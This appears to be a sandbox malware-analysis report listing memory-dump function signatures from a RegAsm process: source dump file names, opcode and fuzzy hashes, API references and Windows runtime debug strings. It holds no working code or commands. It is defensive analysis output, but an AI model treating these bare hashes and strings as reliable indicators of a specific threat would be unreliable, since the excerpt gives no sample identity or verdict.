                  Memory Dump Source
                  • Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true
                  • Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID: __fassign
                  • String ID: .$:$:
                  • API String ID: 3965848254-2308638275
                  • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                  • Instruction ID: b31c25c61a207ffa525e000487b89ced88b4f68c573173bf5f5dc84ae93563c1
                  • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                  • Instruction Fuzzy Hash: 6BA1AC71D0421AEFCF2ECF64C8457BEB7B9AF05309F28846AD852AB282D7349745CB51
                  APIs
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02352206
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true
                  • Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                  • API String ID: 885266447-4236105082
                  • Opcode ID: 201b90f1769bacba9ca4e0700586fb29cad3ec643a314eae77765e7afa2da6ad
                  • Instruction ID: 2a57b3f439bca921e285f7cbdb70df49ed905d294a651385765b0e8349244890
                  • Opcode Fuzzy Hash: 201b90f1769bacba9ca4e0700586fb29cad3ec643a314eae77765e7afa2da6ad
                  • Instruction Fuzzy Hash: C45128357003116FEB25CA58CC81FA773AAAF84720F258269FD59DB285DB71ED42CB90
                  APIs
                  • ___swprintf_l.LIBCMT ref: 0235EA22
                    • Part of subcall function 023313CB: ___swprintf_l.LIBCMT ref: 0233146B
                    • Part of subcall function 023313CB: ___swprintf_l.LIBCMT ref: 02331490
                  • ___swprintf_l.LIBCMT ref: 0233156D
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true
                  • Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: %%%u$]:%u
                  • API String ID: 48624451-3050659472
                  • Opcode ID: b5e9ddabd675d4107a010c7a21d82718fd8091903cfc0a9b88a77ad096a880f3
                  • Instruction ID: cc2f209394c522cb672a4ccd1d58b44bead7b27d96d24ee60cbe591955c08fc8
                  • Opcode Fuzzy Hash: b5e9ddabd675d4107a010c7a21d82718fd8091903cfc0a9b88a77ad096a880f3
                  • Instruction Fuzzy Hash: 792195739002299BEB22DF68CC40AEBB3ADBB50714F444565FD8AD3144DB71EB588BD1
                  APIs
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023522F4
                  Strings
                  • RTL: Re-Waiting, xrefs: 02352328
                  • RTL: Resource at %p, xrefs: 0235230B
                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 023522FC
                  Memory Dump Source
                  • Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true
                  • Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                  • API String ID: 885266447-871070163
                  • Opcode ID: ae862ce03c7370e7c840bdccf4bcccb602a19155066503b8e19ab911e1b4e1a7
                  • Instruction ID: 51feb8606aef6abc9d717388f7e6cbdc91b3da13e502a136ca3c33fd72e811b9
                  • Opcode Fuzzy Hash: ae862ce03c7370e7c840bdccf4bcccb602a19155066503b8e19ab911e1b4e1a7
                  • Instruction Fuzzy Hash: 5C5106716117116BEF25DB68CC80FA773E9AF84324F104669FD49DB280EB71E941CBA0
                  Strings
                  • RTL: Re-Waiting, xrefs: 023524FA
                  • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 023524BD
                  • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0235248D
                  Memory Dump Source
                  • Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true
                  • Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                  • API String ID: 0-3177188983
                  • Opcode ID: 4fac2ee2c9e0ab4cc52eafa6860ae1a9223b7ceccae2916b207f5cedbc96d9ee
                  • Instruction ID: 87725fbb56044e09a795c0bd646a6d0d5b2511f00cdd36464b00559f9e7e3a81
                  • Opcode Fuzzy Hash: 4fac2ee2c9e0ab4cc52eafa6860ae1a9223b7ceccae2916b207f5cedbc96d9ee
                  • Instruction Fuzzy Hash: A441C4B0A00314ABDB34DBA8CC85F6B77AAAF44320F108655FE599B2C1D735E941CB61
                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true
                  • Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID: __fassign
                  • String ID:
                  • API String ID: 3965848254-0
                  • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                  • Instruction ID: b03f1ffa14fd986831c94d80203b6a077c9f3a7e1f626d04a9ffee96fdd209d8
                  • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                  • Instruction Fuzzy Hash: F391A231D0022AEFDF25CF58C845BAEB7B4FF45708F20846AD859A7552E7309B49CB91